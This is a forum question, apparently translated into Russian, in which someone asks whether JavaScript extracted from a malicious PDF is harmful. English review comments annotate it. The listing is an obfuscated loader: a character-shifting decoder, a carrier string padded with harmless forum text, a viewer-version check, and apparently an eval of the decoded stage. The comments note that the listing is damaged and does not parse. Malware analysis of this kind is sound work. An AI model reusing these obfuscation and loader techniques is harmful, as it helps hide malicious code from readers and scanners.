Понимание потенциального вредоносного JavaScript (эксплойт уязвимости PDF) - PullRequest
/ 26 октября 2018

Я изучаю вредоносное ПО в формате PDF. Я извлёк из него JavaScript и просканировал его; хэш извлечённого JavaScript-файла — sha256: 0ace77aaac3da51ac4af16b7fbc9828c8cfbd7b1b1af2e69e4a8a3cda4eb1398. Однако я заметил, что на самом деле это не так: в коде есть вызов app.viewerVersion.toString() (он возвращает версию вашего Acrobat Reader), но я не вижу, чтобы сценарий впоследствии использовал эту информацию.

Может ли кто-нибудь сказать, является ли этот код вообще вредоносным и, если да, что именно он делает? Код ниже:

Заранее спасибо,

'use strict';
/**


@return {undefined}
/
// STARTSCRIPT: script recovered from the PDF. It defines two
// character-building helpers (we, we2), a string decoder (DEWMaiAhjHR) and a
// carrier string (dWMaiAhjHR), then reads the first character of
// app.viewerVersion and hands it to print(), which decodes part of the
// carrier string.
// NOTE(review): this listing looks damaged by the page markup and does not
// parse as shown: most doc comments end in a bare slash (the asterisk of the
// terminator is missing), the long string literal is hard-wrapped and never
// closed, and the two expressions in print() that start with internalwe( and
// thiswe( were presumably bracketed member calls on internal and on this
// whose brackets and call arguments were swallowed. The JSDoc annotations,
// the use strict directive and names such as workshopper or tickArray look
// like beautifier output, so this text presumably does not hash to the
// sha256 quoted for the extracted file - confirm against the raw stream.
function STARTSCRIPT() {
/*

@param {boolean} workshopper
@param {string} id
@param {boolean} min
@param {string} msg
@return {undefined}
/
// init: range check for a form field. Reads event.value and, when the
// workshopper or min flag is set, rejects a value at or below id, or at or
// above msg, with an alert, a beep and event.rc = false.
// Nothing in the visible listing calls it - presumably filler that makes the
// script look like ordinary form-validation code.
function init(workshopper, id, min, msg) {
value = event.value;
if (workshopper && value <= id) {
app.alert("Value must be greater than " + id);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
if (min && value >= msg) {
app.alert("Value must be less than " + msg);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
}
/*
@param {number} type
@param {number} e
@param {!Object} internal
@return {undefined}
/
// print: called once, at the end of STARTSCRIPT, with type = first character
// of the viewer version, e = that character divided by 2 and internal = the
// carrier string. For a single character e is at most 4.5 (NaN for a
// non-digit), so the console.println branch is never taken by that call and
// the else branch always runs.
function print(type, e, internal) {
if (e > 11) {
console.println("Entering function: myFunction");
console.println(" Parameter 1: aWMaiAhjHR = " + type);
console.println(" Parameter 2: bWMaiAhjHR = " + e);
} else {
// we(type, 105) yields the letter s when type is a single digit, so the
// first argument spells the method name substr; presumably
// internal.substr(offset) selected the encoded tail of the carrier string
// (the offset is lost in this listing - TODO confirm against the raw script).
// The second argument is the decode key: for a single digit, 27 + (type - 3)
// is below 60, the modulo term cancels it, and the key evaluates to 3.
code = DEWMaiAhjHR(internalwe(type, 105) + "ub" + we(type, 105) + "tr", 3 +                             
(27 + (type - 3) - (27 + (type - 3)) % 60) * 4);
// The four we() calls yield the letters e, v, a, l: presumably this was a
// call of eval on code, i.e. the decoded text is executed as the next stage.
// For static analysis, print the decoded string instead of evaluating it.
thiswe(type, 91) + we(type, 108) + we(type, 87) + we(type, 98);
}
}
/*
@param {string} val
@param {number} tickArray
@return {?}
/
// DEWMaiAhjHR(val, tickArray): decoder. Percent-decodes val with unescape,
// then maps every code unit c to (c - tickArray) XOR tickArray (subtraction
// binds tighter than the XOR operator) and concatenates the results.
// we2(31, x) is plain String.fromCharCode(x), because 31 % 55 - 31 is 0.
// Assigns ecWMaiAhjHR, frWMaiAhjHR and j without declaring them.
this.DEWMaiAhjHR = function(val, tickArray) {
/* @type {string} /
ecWMaiAhjHR = "";
/* @type {string} /
val = unescape(val);
/* @type {number} /
frWMaiAhjHR = val.length;
/* @type {number} /
j = 0;
for (; j < frWMaiAhjHR;) {
ecWMaiAhjHR = ecWMaiAhjHR + we2(31, val.charCodeAt(j) - tickArray ^         
tickArray);
j++;
}
return ecWMaiAhjHR;
};
// dWMaiAhjHR: carrier string. Readable forum and product text (presumably
// padding that makes the script look benign) followed, after the equals
// sign, by a percent-escaped encoded payload. Hand-decoding the visible
// fragment with key 3 gives statements that read app.viewerVersion again and
// begin stripping non-digit characters from it, so the use of the version
// that the question asks about appears to live in the decoded stage; the
// fragment is cut off before anything further is visible.
/* @type {string} /
dWMaiAhjHR = 'I need a javascript that I can place in a form field             
properties area that will replace a "&" symbol with the word "and".....any     
help would be greatly appreciated. There are a couple of places you can 
enter a script that modifies the contents of the field. The question is, do 
you want the value of the form field to be altered, or just what the user 
sees on the screen? To modify the value of the field you will need to use a 
custom keystroke script. To modify the appearance of the field you will need 
to enter a format script. You can find articles on both of these in the 
tutorial on this site. The script itself can be done with the JavaScript 
"replace" function, In both cases (assuming that youve got an AcroForm) the 
code will look like this. PHP - Java Chat system for web site. Client is 
Java applet can run in any Java enabled browsers. The server side is PHP 
script can be installed on any PHP enabled web host. Interface text can be 
customized in any language. Multi rooms. Java Script Mutator is intended for 
optimization and protection of your Java Scripts from theft and 
modifications. Gnostice PDFOne Java is a pure Java library which provides a 
rich set of APIs to Create, Fill and Read PDF Forms, Secure, Merge, Split, 
Stamp PDF documents. = %0Cxet%26EctoXit%26A%26evv0xmiwitXitsmop0zoSztmpg.- 
%3B%0CEctoXit%26A%26EctoXit0tivreci.%2FbJ%2Fg2%24%24
/*
@param {number} nextActionList
@param {number} index
@return {?}
/
// we2(nextActionList, index): returns
// String.fromCharCode(nextActionList % 55 - nextActionList + index). For
// nextActionList from 0 to 54 the first two terms cancel, leaving
// fromCharCode(index).
this.we2 = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + index);
};
/*
@param {number} nextActionList
@param {number} index
@return {?}
*/
// we(nextActionList, index): same arithmetic as we2 with 10 added, i.e.
// fromCharCode(index + 10) for nextActionList from 0 to 54. print() uses it
// to assemble method names one character at a time, presumably so that the
// names never appear as plain strings in the script.
this.we = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + 10 +     
index);
};
// Viewer fingerprint: take the first character of the viewer version string
// (a digit for numeric versions). It is passed to print() as type, where it
// feeds we() and the key formula, and halved as e, where it selects the
// branch; the carrier string is passed as internal.
hWMaiAhjHR = app.viewerVersion.toString();
hWMaiAhjHR = hWMaiAhjHR.charAt(0);
print(hWMaiAhjHR, hWMaiAhjHR / 2, dWMaiAhjHR);
}
;
...